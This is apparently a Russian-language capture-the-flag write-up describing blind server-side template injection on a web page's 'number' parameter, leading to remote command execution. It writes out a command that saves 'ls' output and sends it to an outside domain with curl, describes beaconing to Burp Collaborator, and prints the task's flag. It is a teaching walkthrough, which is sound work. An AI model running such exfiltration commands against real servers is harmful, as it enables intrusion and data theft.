Нас встречает главная страница
![alt text](image.png)
1. Любое задание на веб начинаем с изучения кода страницы.
![alt text](image-1.png)
2. Из кода страницы узнаём, что для того чтобы отправлять числа надо формировать запрос с GET-параметром number. И находим подсказку про шаблоны. Очевидно, что это намёк на один из шаблонизаторов, осталось узнать какой используется, проведя несколько тестов. 
![alt text](image-2.png)
3. Однако сервер не возвращает нам прямого ответа, который мог бы подтвердить исполнение шаблона. 
![alt text](image-3.png)
Но мы не сдаёмся и отправляем на сервер тип данных не подходящий под число и видим, что сервер ответил нам «Это даже не число», из этого делаем вывод что шаблон, отправленный до этого, собрался в 49, и сервер посчитал его числом.
![alt text](image-4.png)

4. Blind SSTI
Находим нужный нам payload с rce и проверим выполнение через **curl** постучавшись, например, на burp collaborator. 
![alt text](image-5.png)
И видим успех. Запрос пришёл, а значит команды выполняются. 
![alt text](image-6.png)

Теперь запишем результат выполнения команды **ls** и вышлем с помощью **curl** файл с результатом.
```ls > test.txt; curl –d @test.txt “domain”```
И нам придёт результат выполнения 
![alt text](image-7.png)
Таким образом мы можем выполнить команды для поиска флага системе, например find и grep, после чего выслать его себе благодаря **curl**
**Флаг: RDGCTF{wh4t_ab0ut_fu11_bl1nd_sst1?}**
